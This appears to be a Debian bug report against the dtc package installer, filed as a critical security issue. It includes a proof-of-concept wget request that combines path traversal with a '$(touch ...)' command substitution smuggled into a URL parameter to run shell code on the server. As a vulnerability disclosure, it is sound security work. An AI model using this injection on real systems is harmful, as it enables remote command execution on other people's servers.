Package: src:dtc Version: 0.32.10-2 Severity: critical Tags: security upstream
The package installer helpfully allows users to run shell code: wget -q -O- 'http://localhost:8080/dtc/?adm_login=asd&adm_pass=asdf&action=do_install&pkg=../../../../../../../../../tmp&addrlink=asd.com/package-installer&dtcpkg_directory=$(touch /tmp/more-owned)/tmp/foo&subdomain=www' Ansgar -- To UNSUBSCRIBE, email to [email protected] with a subject of "unsubscribe". Trouble? Contact [email protected]
